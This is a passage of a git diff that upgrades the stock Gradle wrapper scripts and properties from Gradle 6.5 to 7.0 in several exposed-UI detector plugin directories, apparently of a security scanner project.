@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/jupyter/gradlew.bat b/google/detectors/exposedui/jupyter/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/detectors/exposedui/jupyter/gradlew.bat +++ b/google/detectors/exposedui/jupyter/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/kubernetes/gradlew b/google/detectors/exposedui/kubernetes/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/kubernetes/gradlew +++ b/google/detectors/exposedui/kubernetes/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/kubernetes/gradlew.bat b/google/detectors/exposedui/kubernetes/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/kubernetes/gradlew.bat +++ b/google/detectors/exposedui/kubernetes/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/nodered/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/nodered/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/google/detectors/exposedui/nodered/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/nodered/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.jar differ 
